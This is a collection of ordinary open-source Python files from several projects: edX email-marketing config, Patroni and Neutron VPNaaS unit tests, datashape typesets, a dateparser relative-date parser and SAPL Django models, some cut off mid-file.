            "Sailthru minutes to wait before sending abandoned cart message. Deprecated."
        )
    )

    sailthru_enroll_template = models.fields.CharField(
        max_length=20,
        blank=True,
        help_text=_(
            "Sailthru send template to use on enrolling for audit. "
        )
    )

    sailthru_verification_passed_template = models.fields.CharField(
        max_length=20,
        blank=True,
        help_text=_(
            "Sailthru send template to use on passed ID verification."
        )
    )

    sailthru_verification_failed_template = models.fields.CharField(
        max_length=20,
        blank=True,
        help_text=_(
            "Sailthru send template to use on failed ID verification."
        )
    )

    sailthru_upgrade_template = models.fields.CharField(
        max_length=20,
        blank=True,
        help_text=_(
            "Sailthru send template to use on upgrading a course. Deprecated "
        )
    )

    # Garbled text repaired here: "tem | plate" -> "template".
    sailthru_purchase_template = models.fields.CharField(
        max_length=20,
        blank=True,
        help_text=_(
            "Sailthru send template to use on purchasing a course seat. Deprecated "
        )
    )

    # Sailthru purchases can be tagged with interest tags to provide information about the types of courses
    # users are interested in. The easiest way to get the tags currently is the Sailthru content API which
    # looks in the content library (the content library is populated daily with a script that pulls the data
    # from the course discovery API) This option should normally be on, but it does add overhead to processing
    # purchases and enrolls.
    sailthru_get_tags_from_sailthru = models.BooleanField(
        default=True,
        help_text=_('Use the Sailthru content API to fetch course tags.')
    )

    sailthru_content_cache_age = models.fields.IntegerField(
        default=3600,
        help_text=_(
            "Number of seconds to cache course content retrieved from Sailthru."
        )
    )

    sailthru_enroll_cost = models.fields.IntegerField(
        default=100,
        help_text=_(
            "Cost in cents to report to Sailthru for enrolls."
        )
    )

    sailthru_lms_url_override = models.fields.CharField(
        max_length=80,
        blank=True,
        help_text=_(
            "Optional lms url scheme + host used to construct urls for content library, e.g. https://courses.edx.org."
        )
    )

    # The number of seconds to delay for welcome emails sending. This is needed to acommendate those
    # learners who created user account during course enrollment so we can send a different message
    # in our welcome email.
    welcome_email_send_delay = models.fields.IntegerField(
        default=600,
        help_text=_(
            "Number of seconds to delay the sending of User Welcome email after user has been created"
        )
    )

    # The number of seconds to delay/timeout wait to get cookie values from sailthru.
    user_registration_cookie_timeout_delay = models.fields.FloatField(
        default=3.0,
        help_text=_(
            "The number of seconds to delay/timeout wait to get cookie values from sailthru."
        )
    )

    def __str__(self):
        return "Email marketing configuration: New user list %s, Welcome template: %s" % \
               (self.sailthru_new_user_list, self.sailthru_welcome_template)
|
CityOfNewYork/NYCOpenRecords | tests/functional/test_requests.py | Python | apache-2.0 | 170 | 0.005882 | # -*- coding: utf-8 | -*-
"""Test Request Module
This module contains the tests for the OpenRecords `/request` | endpoint.
"""
import pytest
from app.models import Requests |
sean-/patroni | tests/test_patroni.py | Python | mit | 7,260 | 0.001102 | import datetime
import patroni.zookeeper
import psycopg2
import subprocess
import sys
import time
import unittest
import yaml
from mock import Mock, patch
from patroni.api import RestApiServer
from patroni.dcs import Cluster, Member, Leader
from patroni.etcd import Etcd
from patroni.exceptions import DCSError, PostgresException
from patroni import Patroni, main
from patroni.zookeeper import ZooKeeper
from six.moves import BaseHTTPServer
from test_api import Mock_BaseServer__is_shut_down
from test_etcd import Client, etcd_read, etcd_write
from test_ha import true, false
from test_postgresql import Postgresql, subprocess_call, psycopg2_connect
from test_zookeeper import MockKazooClient
def nop(*args, **kwargs):
    """Accept anything, do nothing -- generic stub for monkey-patched callables."""
    return None
class SleepException(Exception):
    """Raised by the patched time.sleep to break out of otherwise endless loops."""
    pass
def time_sleep(*args):
    # Stand-in for time.sleep: abort the caller's loop instead of waiting.
    raise SleepException()
def keyboard_interrupt(*args):
    """Stand-in callable that simulates the user pressing Ctrl-C."""
    raise KeyboardInterrupt()
class Mock_BaseServer__is_shut_down:
    """threading.Event look-alike whose operations are all no-ops.

    NOTE: shadows the identically-named import from test_api above.
    """

    def wait(self):
        return None

    def set(self):
        return None

    def clear(self):
        return None
def get_cluster(initialize, leader):
    # Build a Cluster with only the fields these tests care about.
    return Cluster(initialize, leader, None, None)
def get_cluster_not_initialized_without_leader():
    # initialize key absent, no leader elected.
    return get_cluster(None, None)
def get_cluster_initialized_without_leader():
    # Cluster initialized but currently leaderless.
    return get_cluster(True, None)
def get_cluster_not_initialized_with_leader():
    # initialize flag False yet a leader key exists.
    return get_cluster(False, Leader(0, 0, 0,
                                     Member(0, 'leader', 'postgres://replicator:rep-pass@127.0.0.1:5435/postgres',
                                            None, None, 28)))
def get_cluster_initialized_with_leader():
    # Healthy cluster: initialized and a leader is present.
    return get_cluster(True, Leader(0, 0, 0,
                                    Member(0, 'leader', 'postgres://replicator:rep-pass@127.0.0.1:5435/postgres',
                                           None, None, 28)))
def get_cluster_dcs_error():
    # Simulates the DCS being unreachable.
    raise DCSError('')
class TestPatroni(unittest.TestCase):
    """Unit tests for the top-level Patroni daemon object.

    setUp/tearDown are bound via __init__ so subclass discovery keeps the
    custom fixture names.  This block also repairs two garbled tokens from
    the source chunk (``touch_m | ember`` and a stray ``|``).
    """

    def __init__(self, method_name='runTest'):
        self.setUp = self.set_up
        self.tearDown = self.tear_down
        super(TestPatroni, self).__init__(method_name)

    def set_up(self):
        # Patch out everything that would touch processes, sockets or disk.
        self.touched = False
        self.init_cancelled = False
        subprocess.call = subprocess_call
        psycopg2.connect = psycopg2_connect
        self.time_sleep = time.sleep
        time.sleep = nop
        self.write_pg_hba = Postgresql.write_pg_hba
        self.write_recovery_conf = Postgresql.write_recovery_conf
        Postgresql.write_pg_hba = nop
        Postgresql.write_recovery_conf = nop
        BaseHTTPServer.HTTPServer.__init__ = nop
        RestApiServer._BaseServer__is_shut_down = Mock_BaseServer__is_shut_down()
        RestApiServer._BaseServer__shutdown_request = True
        RestApiServer.socket = 0
        with open('postgres0.yml', 'r') as f:
            config = yaml.load(f)
        with patch.object(Client, 'machines') as mock_machines:
            mock_machines.__get__ = Mock(return_value=['http://remotehost:2379'])
            self.p = Patroni(config)

    def tear_down(self):
        # Restore the globals patched in set_up().
        time.sleep = self.time_sleep
        Postgresql.write_pg_hba = self.write_pg_hba
        Postgresql.write_recovery_conf = self.write_recovery_conf

    def test_get_dcs(self):
        patroni.zookeeper.KazooClient = MockKazooClient
        self.assertIsInstance(self.p.get_dcs('', {'zookeeper': {'scope': '', 'hosts': ''}}), ZooKeeper)
        self.assertRaises(Exception, self.p.get_dcs, '', {})

    def test_patroni_main(self):
        main()
        sys.argv = ['patroni.py', 'postgres0.yml']

        time.sleep = time_sleep
        with patch.object(Client, 'machines') as mock_machines:
            mock_machines.__get__ = Mock(return_value=['http://remotehost:2379'])
            Patroni.initialize = nop
            touch_member = Patroni.touch_member
            run = Patroni.run
            Patroni.touch_member = self.touch_member
            Patroni.run = time_sleep
            Etcd.delete_leader = nop
            self.assertRaises(SleepException, main)
            Patroni.run = keyboard_interrupt
            main()
            Patroni.run = run
            Patroni.touch_member = touch_member

    def test_patroni_run(self):
        time.sleep = time_sleep
        self.p.touch_member = self.touch_member
        self.p.ha.state_handler.sync_replication_slots = time_sleep
        self.p.ha.dcs.client.read = etcd_read
        self.p.ha.dcs.watch = time_sleep
        self.assertRaises(SleepException, self.p.run)
        self.p.ha.state_handler.is_leader = false
        self.p.api.start = nop
        self.assertRaises(SleepException, self.p.run)

    def touch_member(self, ttl=None):
        # First call reports failure, later calls succeed.
        if not self.touched:
            self.touched = True
            return False
        return True

    def test_touch_member(self):
        self.p.ha.dcs.client.write = etcd_write
        self.p.touch_member()
        now = datetime.datetime.utcnow()
        member = Member(0, self.p.postgresql.name, 'b', 'c', (now + datetime.timedelta(
            seconds=self.p.shutdown_member_ttl + 10)).strftime('%Y-%m-%dT%H:%M:%S.%fZ'), None)
        self.p.ha.cluster = Cluster(True, member, 0, [member])
        self.p.touch_member()

    def test_patroni_initialize(self):
        self.p.ha.dcs.client.write = etcd_write
        self.p.ha.dcs.client.read = etcd_read
        self.p.touch_member = self.touch_member
        self.p.postgresql.data_directory_empty = true
        self.p.ha.dcs.initialize = true
        self.p.postgresql.initialize = true
        self.p.postgresql.start = true
        self.p.ha.dcs.get_cluster = get_cluster_not_initialized_without_leader
        self.p.initialize()
        self.p.ha.dcs.initialize = false
        self.p.ha.dcs.get_cluster = get_cluster_initialized_with_leader
        time.sleep = time_sleep
        self.p.ha.dcs.client.read = etcd_read
        self.p.initialize()
        self.p.ha.dcs.get_cluster = get_cluster_initialized_without_leader
        self.assertRaises(SleepException, self.p.initialize)
        self.p.postgresql.data_directory_empty = false
        self.p.initialize()
        self.p.ha.dcs.get_cluster = get_cluster_not_initialized_with_leader
        self.p.postgresql.data_directory_empty = true
        self.p.initialize()
        self.p.ha.dcs.get_cluster = get_cluster_dcs_error
        self.assertRaises(SleepException, self.p.initialize)

    def test_schedule_next_run(self):
        self.p.ha.dcs.watch = lambda e: True
        self.p.schedule_next_run()
        self.p.next_run = time.time() - self.p.nap_time - 1
        self.p.schedule_next_run()

    def cancel_initialization(self):
        # Recorded so the test below can assert cleanup happened.
        self.init_cancelled = True

    def test_cleanup_on_initialization(self):
        self.p.ha.dcs.client.write = etcd_write
        self.p.ha.dcs.client.read = etcd_read
        self.p.ha.dcs.get_cluster = get_cluster_not_initialized_without_leader
        self.p.touch_member = self.touch_member
        self.p.postgresql.data_directory_empty = true
        self.p.ha.dcs.initialize = true
        self.p.postgresql.initialize = true
        self.p.postgresql.start = false
        self.p.ha.dcs.cancel_initialization = self.cancel_initialization
        self.assertRaises(PostgresException, self.p.initialize)
        self.assertTrue(self.init_cancelled)
|
ContinuumIO/datashape | datashape/typesets.py | Python | bsd-2-clause | 5,475 | 0.000731 | """
Traits constituting sets of types.
"""
from itertools import chain
from .coretypes import (Unit, int8, int16, int32, int64, uint8, uint16, uint32,
uint64, float16, float32, float64, complex64,
complex128, bool_, Decimal, TimeDelta, Option)
__all__ = ['TypeSet', 'matches_typeset', 'signed', 'unsigned', 'integral',
'floating', 'complexes', 'boolean', 'numeric', 'scalar',
'maxtype']
class TypeSet(Unit):
    """
    Create a new set of types. Keyword argument 'name' may create a registered
    typeset for use in datashape type strings.
    """
    __slots__ = '_order', 'name'

    def __init__(self, *args, **kwds):
        # Preserve declaration order; the set view is derived on demand.
        self._order = args
        self.name = kwds.get('name')
        if self.name:
            register_typeset(self.name, self)

    @property
    def _set(self):
        return set(self._order)

    @property
    def types(self):
        return self._order

    def __eq__(self, other):
        if not isinstance(other, type(self)):
            return False
        return self.name == other.name and self.types == other.types

    def __hash__(self):
        return hash((self.name, self.types))

    def __contains__(self, val):
        return val in self._set

    def __repr__(self):
        if self.name:
            return '{%s}' % (self.name,)
        return "%s(%s, name=%s)" % (type(self).__name__, self._set, self.name)

    def __or__(self, other):
        # Union preserves iteration order (self first, then other).
        return TypeSet(*chain(self, other))

    def __iter__(self):
        return iter(self._order)

    def __len__(self):
        # Count distinct members, not declaration entries.
        return len(self._set)
def matches_typeset(types, signature):
    """Match argument types to the parameter types of a signature

    >>> matches_typeset(int32, integral)
    True
    >>> matches_typeset(float32, integral)
    False
    >>> matches_typeset(integral, real)
    True
    """
    # Direct membership (e.g. a single type against a typeset).
    if types in signature:
        return True
    # Otherwise compare element-wise: a TypeSet parameter matches by
    # membership, a concrete type by equality.
    for have, want in zip(types, signature):
        if isinstance(want, TypeSet):
            if have not in want:
                return False
        elif have != want:
            return False
    return True
class TypesetRegistry(object):
    """Mapping of global typeset names to their TypeSet instances."""

    def __init__(self):
        self.registry = {}
        # Bound dict.get: missing names yield None instead of raising.
        self.lookup = self.registry.get

    def register_typeset(self, name, typeset):
        """Record *typeset* under *name*; re-registration is an error."""
        if name in self.registry:
            raise TypeError("TypeSet %s already defined with types %s" %
                            (name, self.registry[name].types))
        self.registry[name] = typeset
        return typeset

    def __getitem__(self, key):
        found = self.lookup(key)
        if found is None:
            raise KeyError(key)
        return found
# Module-level singleton registry plus convenience aliases used by the
# rest of the package (and by TypeSet.__init__ above).
registry = TypesetRegistry()
register_typeset = registry.register_typeset
lookup = registry.lookup

#------------------------------------------------------------------------
# Default Type Sets
#------------------------------------------------------------------------

signed = TypeSet(int8, int16, int32, int64, name='signed')
unsigned = TypeSet(uint8, uint16, uint32, uint64, name='unsigned')
# Interleaves signed/unsigned by width: int8, uint8, int16, uint16, ...
integral = TypeSet(*[x for t in zip(signed, unsigned) for x in t],
                   name='integral')
floating = TypeSet(float32, float64, name='floating')
complexes = TypeSet(complex64, complex128, name='complexes')
boolean = TypeSet(bool_, name='boolean')

# Composite sets built with TypeSet.__or__ (order-preserving concatenation).
real = TypeSet(*integral | floating, name='real')
numeric = TypeSet(*integral | floating | complexes, name='numeric')
scalar = TypeSet(*boolean | numeric, name='scalar')

# Concrete type -> owning typeset, used by supertype()/maxtype().
# Note float16 maps to `floating` even though the floating typeset itself
# only lists float32/float64.
supertype_map = {
    int8: signed,
    int16: signed,
    int32: signed,
    int64: signed,
    uint8: unsigned,
    uint16: unsigned,
    uint32: unsigned,
    uint64: unsigned,
    float16: floating,
    float32: floating,
    float64: floating,
    complex64: complexes,
    complex128: complexes,
    bool_: boolean
}
def supertype(measure):
    """Get the super type of a concrete numeric type

    Examples
    --------

    >>> supertype(int8)
    {signed}

    >>> supertype(float32)
    {floating}

    >>> supertype(complex128)
    {complexes}

    >>> supertype(bool_)
    {boolean}

    >>> supertype(Option(bool_))
    {boolean}
    """
    # Options are transparent: classify the wrapped type.
    if isinstance(measure, Option):
        measure = measure.ty
    # Validate with an explicit raise rather than `assert` so the check
    # survives `python -O`, and so the failure mode matches maxtype(),
    # which raises TypeError for non-numeric measures.
    if not matches_typeset(measure, scalar):
        raise TypeError('measure must be numeric')
    return supertype_map[measure]
def maxtype(measure):
    """Get the maximum width for a particular numeric type

    Examples
    --------

    >>> maxtype(int8)
    ctype("int64")

    >>> maxtype(Option(float64))
    Option(ty=ctype("float64"))

    >>> maxtype(bool_)
    ctype("bool")

    >>> maxtype(Decimal(11, 2))
    Decimal(precision=11, scale=2)

    >>> maxtype(Option(Decimal(11, 2)))
    Option(ty=Decimal(precision=11, scale=2))

    >>> maxtype(TimeDelta(unit='ms'))
    TimeDelta(unit='ms')

    >>> maxtype(Option(TimeDelta(unit='ms')))
    Option(ty=TimeDelta(unit='ms'))
    """
    measure = measure.measure
    wrapped = isinstance(measure, Option)
    if wrapped:
        measure = measure.ty

    # Accept numeric scalars plus Decimal/TimeDelta measures.
    acceptable = (matches_typeset(measure, scalar) or
                  isinstance(measure, (Decimal, TimeDelta)))
    if not acceptable:
        raise TypeError('measure must be numeric')

    if measure == bool_:
        widest = bool_
    elif isinstance(measure, (Decimal, TimeDelta)):
        # These carry their own precision; there is no wider variant.
        widest = measure
    else:
        # Widest member of the measure's typeset, by item size in bytes.
        widest = max(supertype(measure).types, key=lambda ty: ty.itemsize)

    return Option(widest) if wrapped else widest
|
oeeagle/quantum | neutron/tests/unit/services/vpn/test_vpnaas_extension.py | Python | apache-2.0 | 26,021 | 0.000038 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Swaminathan Vasudevan, Hewlett-Packard.
import copy
import mock
from oslo.config import cfg
from webob import exc
import webtest
from neutron.api import extensions
from neutron.api.v2 import attributes
from neutron.common import config
from neutron.extensions import vpnaas
from neutron import manager
from neutron.openstack.common import uuidutils
from neutron.plugins.common import constants
from neutron import quota
from neutron.tests.unit import test_api_v2
from neutron.tests.unit import test_extensions
from neutron.tests.unit import testlib_api
_uuid = uuidutils.generate_uuid
_get_path = test_api_v2._get_path
class VpnaasTestExtensionManager(object):
    """Minimal extension manager that exposes only the VPNaaS resources."""

    def get_resources(self):
        # Merge the VPNaaS attributes into the global attribute map here,
        # because the test setup never initializes the main API router,
        # which would normally extend the global map.
        vpn_attrs = vpnaas.RESOURCE_ATTRIBUTE_MAP
        attributes.RESOURCE_ATTRIBUTE_MAP.update(vpn_attrs)
        return vpnaas.Vpnaas.get_resources()

    def get_actions(self):
        return []

    def get_request_extensions(self):
        return []
class VpnaasExtensionTestCase(testlib_api.WebTestCase):
fmt = 'json'
def setUp(self):
super(VpnaasExtensionTestCase, self).setUp()
plugin = 'neutron.extensions.vpnaas.VPNPluginBase'
# Ensure 'stale' patched copies of the plugin are never returned
manager.NeutronManager._instance = None
# Ensure existing ExtensionManager is not used
extensions.PluginAwareExtensionManager._instance = None
# Create the default configurations
args = ['--config-file', test_api_v2.etcdir('neutron.conf.test')]
config.parse(args)
#just stubbing core plugin with LoadBalancer plugin
cfg.CONF.set_override('core_plugin', plugin)
cfg.CONF.set_override('service_plugins', [plugin])
self._plugin_patcher = mock.patch(plugin, autospec=True)
self.plugin = self._plugin_patcher.start()
instance = self.plugin.return_value
instance.get_plugin_type.return_value = constants.VPN
ext_mgr = VpnaasTestExtensionManager()
self.ext_mdw = test_extensions.setup_extensions_middleware(ext_mgr)
self.api = webtest.TestApp(self.ext_mdw)
super(VpnaasExtensionTestCase, self).setUp()
quota.QUOTAS._driver = None
cfg.CONF.set_override('quota_driver', 'neutron.quota.ConfDriver',
group='QUOTAS')
    def tearDown(self):
        # Undo setUp in reverse: stop the plugin patch, drop references to
        # the app/plugin, and clear all oslo.config overrides before the
        # base-class teardown runs.
        self._plugin_patcher.stop()
        self.api = None
        self.plugin = None
        cfg.CONF.reset()
        super(VpnaasExtensionTestCase, self).tearDown()
    def test_ikepolicy_create(self):
        """Test case to create an ikepolicy."""
        ikepolicy_id = _uuid()
        data = {'ikepolicy': {'name': 'ikepolicy1',
                              'description': 'myikepolicy1',
                              'auth_algorithm': 'sha1',
                              'encryption_algorithm': 'aes-128',
                              'phase1_negotiation_mode': 'main',
                              'lifetime': {
                                  'units': 'seconds',
                                  'value': 3600},
                              'ike_version': 'v1',
                              'pfs': 'group5',
                              'tenant_id': _uuid()}}
        # The mocked plugin echoes the request payload plus a generated id.
        return_value = copy.copy(data['ikepolicy'])
        return_value.update({'id': ikepolicy_id})

        instance = self.plugin.return_value
        instance.create_ikepolicy.return_value = return_value
        res = self.api.post(_get_path('vpn/ikepolicies', fmt=self.fmt),
                            self.serialize(data),
                            content_type='application/%s' % self.fmt)
        # The API layer must pass the request body through unchanged.
        instance.create_ikepolicy.assert_called_with(mock.ANY,
                                                     ikepolicy=data)
        self.assertEqual(res.status_int, exc.HTTPCreated.code)
        # Response body must contain the plugin's return value verbatim.
        res = self.deserialize(res)
        self.assertIn('ikepolicy', res)
        self.assertEqual(res['ikepolicy'], return_value)
def test_ikepolicy_list(self):
"""Test case to list all ikepolicies."""
ikepolicy_id = _uuid()
return_value = [{'name': 'ikepolicy1',
'auth_algorithm': 'sha1',
'encryption_algorithm': 'aes-128',
'pfs': 'group5',
'ike_version': 'v1',
'id': ikepolicy_id}]
instance = self.plugin.return_value
instance.get_ikepolicies.return_value = return_value
res = self.api.get(_get_path('vpn/ikepolicies', fmt=self.fmt))
instance.get_ikepolicies.assert_called_with(mock.ANY,
fields=mock.ANY,
filters=mock.ANY)
self.assertEqual(res.status_int, exc.HTTPOk.code)
    def test_ikepolicy_update(self):
        """Test case to update an ikepolicy."""
        ikepolicy_id = _uuid()
        # Partial update: only name and encryption algorithm are sent.
        update_data = {'ikepolicy': {'name': 'ikepolicy1',
                                     'encryption_algorithm': 'aes-256'}}
        # The mocked plugin returns the full, merged policy.
        return_value = {'name': 'ikepolicy1',
                        'auth_algorithm': 'sha1',
                        'encryption_algorithm': 'aes-256',
                        'phase1_negotiation_mode': 'main',
                        'lifetime': {
                            'units': 'seconds',
                            'value': 3600},
                        'ike_version': 'v1',
                        'pfs': 'group5',
                        'tenant_id': _uuid(),
                        'id': ikepolicy_id}

        instance = self.plugin.return_value
        instance.update_ikepolicy.return_value = return_value

        res = self.api.put(_get_path('vpn/ikepolicies', id=ikepolicy_id,
                                     fmt=self.fmt),
                           self.serialize(update_data))

        # The API layer must forward the id and the unchanged body.
        instance.update_ikepolicy.assert_called_with(mock.ANY, ikepolicy_id,
                                                     ikepolicy=update_data)
        self.assertEqual(res.status_int, exc.HTTPOk.code)
        res = self.deserialize(res)
        self.assertIn('ikepolicy', res)
        self.assertEqual(res['ikepolicy'], return_value)
def test_ikepolicy_get(self):
"""Test case to get or show an ikepolicy."""
ikepolicy_id = _uuid()
return_value = {'name': 'ikepolicy1',
'auth_algorithm': 'sha1',
'encryption_algorithm': 'aes-128',
'phase1_negotiation_mode': 'main',
'lifetime': {
'units': 'seconds',
'value': 3600},
'ike_version': 'v1',
'pfs': 'group5',
'tenant_id': _uuid(),
'id': ikepolicy_id}
instance = self.plugin.return_value
instance.get_ikepolicy.return_value = return_value
res = self.api.get(_get_path('vpn/ikepolicies', id=ikepolicy_id,
fmt=self.fmt))
instance.get_ikepolicy.assert_called_with(mock.ANY,
ikepolicy_id,
fields=mo |
mpercich/Calendarize | ios/dateparser/lib/python2.7/site-packages/dateparser/freshness_date_parser.py | Python | mit | 3,641 | 0.001648 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import regex as re
from datetime import datetime
from datetime import time
from dateutil.relativedelta import relativedelta
from dateparser.utils import apply_timezone, localize_timezone
from .parser import time_parser
# Singular unit names recognised in relative-date strings.  Input is
# presumably normalised to these singular forms by dateparser's
# translation layer before reaching this module -- TODO confirm.
_UNITS = r'year|month|week|day|hour|minute|second'

# Matches "<number><optional space><unit>" pairs, e.g. "3 hours";
# case-insensitive, with a word boundary after the unit.
PATTERN = re.compile(r'(\d+)\s*(%s)\b' % _UNITS, re.I | re.S | re.U)
class FreshnessDateDataParser(object):
    """Parses date strings like "1 year, 2 months ago" and
    "3 hours, 50 minutes ago"."""

    def __init__(self):
        # Reference "now" used while a parse() call is in flight; reset to
        # None afterwards.  NOTE(review): this mutable instance state makes
        # the shared `freshness_date_parser` singleton non-thread-safe.
        self.now = None

    def _are_all_words_units(self, date_string):
        """Return True when every word is a unit, number, ago/in or time token."""
        skip = [_UNITS,
                r'ago|in|\d+',
                r':|[ap]m']

        date_string = re.sub(r'\s+', ' ', date_string.strip())
        words = [word for word in re.split(r'\W', date_string) if word]
        skip_re = r'%s' % '|'.join(skip)
        leftover = [word for word in words if not re.match(skip_re, word)]
        return not leftover

    def _parse_time(self, date_string, settings):
        """Attempts to parse the time part of strings like '1 day ago, 2 PM'."""
        # Strip the relative part and ago/in markers; whatever remains may
        # be a plain time of day.
        date_string = PATTERN.sub('', date_string)
        date_string = re.sub(r'\b(?:ago|in)\b', '', date_string)
        try:
            return time_parser(date_string)
        except Exception:
            # Was a bare `except:` which also swallowed SystemExit and
            # KeyboardInterrupt.  Having no time part is not an error.
            return None

    def parse(self, date_string, settings):
        _time = self._parse_time(date_string, settings)

        def apply_time(dateobj, timeobj):
            # Guards on the enclosing `_time` (always the value passed as
            # `timeobj` at the single call site below).
            if not isinstance(_time, time):
                return dateobj
            return dateobj.replace(
                hour=timeobj.hour, minute=timeobj.minute,
                second=timeobj.second, microsecond=timeobj.microsecond
            )

        # Establish the reference "now": an explicit RELATIVE_BASE wins;
        # otherwise use the local clock or the configured timezone's clock.
        if settings.RELATIVE_BASE:
            if 'local' not in settings.TIMEZONE.lower():
                self.now = localize_timezone(
                    settings.RELATIVE_BASE, settings.TIMEZONE)
            else:
                self.now = settings.RELATIVE_BASE
        elif 'local' in settings.TIMEZONE.lower():
            self.now = datetime.now()
        else:
            utc_dt = datetime.utcnow()
            self.now = apply_timezone(utc_dt, settings.TIMEZONE)

        date, period = self._parse_date(date_string)

        if date:
            date = apply_time(date, _time)
            if settings.TO_TIMEZONE:
                date = apply_timezone(date, settings.TO_TIMEZONE)

            if not settings.RETURN_AS_TIMEZONE_AWARE:
                date = date.replace(tzinfo=None)

        self.now = None
        return date, period

    def _parse_date(self, date_string):
        """Turn "<n> <unit>, ... [ago]" / "in <n> <unit>" into (datetime, period)."""
        if not self._are_all_words_units(date_string):
            return None, None

        kwargs = self.get_kwargs(date_string)
        if not kwargs:
            return None, None

        # Period is the smallest calendar unit mentioned among
        # week/month/year, defaulting to 'day' (also for hour/minute/second).
        period = 'day'
        if 'days' not in kwargs:
            for k in ['weeks', 'months', 'years']:
                if k in kwargs:
                    period = k[:-1]
                    break

        td = relativedelta(**kwargs)
        if re.search(r'\bin\b', date_string):
            # "in 2 days" -> future; anything else is treated as past.
            date = self.now + td
        else:
            date = self.now - td
        return date, period

    def get_kwargs(self, date_string):
        """Extract relativedelta keyword arguments, e.g. {'days': 1}."""
        matches = PATTERN.findall(date_string)
        if not matches:
            return {}
        # A repeated unit overwrites earlier mentions, as before.
        return {unit + 's': int(num) for num, unit in matches}

    def get_date_data(self, date_string, settings=None):
        date, period = self.parse(date_string, settings)
        return dict(date_obj=date, period=period)
|
interlegis/sapl | sapl/compilacao/models.py | Python | gpl-3.0 | 66,332 | 0.000167 | from django.contrib import messages
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models import F, Q
from django.db.models.aggregates import Max
from django.db.models.deletion import PROTECT
from django.http.response import Http404
from django.template import defaultfilters
from django.utils import timezone
from django.utils.decorators import classonlymethod
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from image_cropping.fields import ImageCropField, ImageRatioField
import reversion
from sapl.compilacao.utils import (get_integrations_view_names, int_to_letter,
int_to_roman)
from sapl.utils import YES_NO_CHOICES, get_settings_auth_user_model,\
texto_upload_path, restringe_tipos_de_arquivo_img
@reversion.register()
class TimestampedMixin(models.Model):
    """Abstract mixin adding automatic creation/modification timestamps."""

    # Set once when the row is first saved.
    created = models.DateTimeField(
        verbose_name=_('created'),
        editable=False, blank=True, auto_now_add=True)
    # Refreshed on every save().
    modified = models.DateTimeField(
        verbose_name=_('modified'), editable=False, blank=True, auto_now=True)

    class Meta:
        abstract = True
@reversion.register()
class BaseModel(models.Model):
    """Abstract base model enforcing unique_together even with NULLs.

    Standard SQL treats NULL != NULL, so databases do not enforce
    unique_together when one of the columns is NULL; clean() emulates
    that check in Python.
    """

    class Meta:
        abstract = True

    def clean(self):
        """
        Check for instances with null values in unique_together fields.
        """
        from django.core.exceptions import ValidationError

        super(BaseModel, self).clean()

        for field_tuple in self._meta.unique_together[:]:
            unique_filter = {}
            unique_fields = []
            null_found = False
            for field_name in field_tuple:
                field_value = getattr(self, field_name)
                if getattr(self, field_name) is None:
                    # NULL column: match other rows with NULL here too.
                    unique_filter['%s__isnull' % field_name] = True
                    null_found = True
                else:
                    unique_filter['%s' % field_name] = field_value
                    unique_fields.append(field_name)
            if null_found:
                # Only needed when a NULL is involved; otherwise the
                # database constraint already covers the tuple.
                unique_queryset = self.__class__.objects.filter(
                    **unique_filter)
                if self.pk:
                    # Exclude the row being updated from the clash check.
                    unique_queryset = unique_queryset.exclude(pk=self.pk)
                if unique_queryset.exists():
                    msg = self.unique_error_message(
                        self.__class__, tuple(unique_fields))
                    raise ValidationError(msg)

    def save(self, force_insert=False, force_update=False, using=None,
             update_fields=None, clean=True):
        # clean() must not run when this save() is being executed by
        # revision_pre_delete_signal (django-reversion), so inspect the
        # call stack for that function name.  HACK: fragile, depends on
        # the signal handler's function name.
        import inspect
        funcs = list(filter(lambda x: x == 'revision_pre_delete_signal',
                            map(lambda x: x[3], inspect.stack())))

        if clean and not funcs:
            self.clean()

        return models.Model.save(
            self,
            force_insert=force_insert,
            force_update=force_update,
            using=using,
            update_fields=update_fields)
@reversion.register()
class PerfilEstruturalTextoArticulado(BaseModel):
    """Structural profile of an articulated text; profiles may inherit
    from a parent profile via `parent`."""

    sigla = models.CharField(
        max_length=10, unique=True, verbose_name=_('Sigla'))
    nome = models.CharField(max_length=50, verbose_name=_('Nome'))
    # Whether this is the default profile (ordering puts defaults first).
    padrao = models.BooleanField(
        default=False,
        choices=YES_NO_CHOICES, verbose_name=_('Padrão'))
    # Inherited (parent) profile; PROTECT prevents deleting a profile
    # that others inherit from.
    parent = models.ForeignKey(
        'self',
        blank=True, null=True, default=None,
        related_name='perfil_parent_set',
        on_delete=PROTECT,
        verbose_name=_('Perfil Herdado'))

    class Meta:
        verbose_name = _('Perfil Estrutural de Texto Articulado')
        verbose_name_plural = _('Perfis Estruturais de Textos Articulados')
        ordering = ['-padrao', 'sigla']

    def __str__(self):
        return self.nome

    @property
    def parents(self):
        # Ancestor chain, root first, excluding self.  Recursive: one
        # query per ancestor; NOTE(review): would loop forever on a
        # cyclic parent chain -- assumed acyclic.
        if not self.parent:
            return []

        parents = self.parent.parents + [self.parent, ]

        return parents
@reversion.register()
class TipoTextoArticulado(models.Model):
    """Type of articulated text, optionally bound to an integrated model
    (content_type) such as a bill or law."""

    sigla = models.CharField(max_length=3, verbose_name=_('Sigla'))
    descricao = models.CharField(max_length=50, verbose_name=_('Descrição'))
    # One-to-one link to the Django model this text type integrates with;
    # SET_NULL keeps the type if the content type disappears.
    content_type = models.OneToOneField(
        ContentType,
        blank=True, null=True,
        on_delete=models.SET_NULL,
        verbose_name=_('Modelo Integrado'))
    # Default for social participation; individual texts may override it.
    participacao_social = models.BooleanField(
        blank=False, default=False,
        choices=YES_NO_CHOICES,
        verbose_name=_('Participação Social'))
    # Whether texts of this type keep a publication history.
    publicacao_func = models.BooleanField(
        choices=YES_NO_CHOICES,
        blank=False, default=False,
        verbose_name=_('Histórico de Publicação'))
    # Only the selected structural profiles are offered in the editor for
    # texts of this type (see help_text).
    perfis = models.ManyToManyField(
        PerfilEstruturalTextoArticulado,
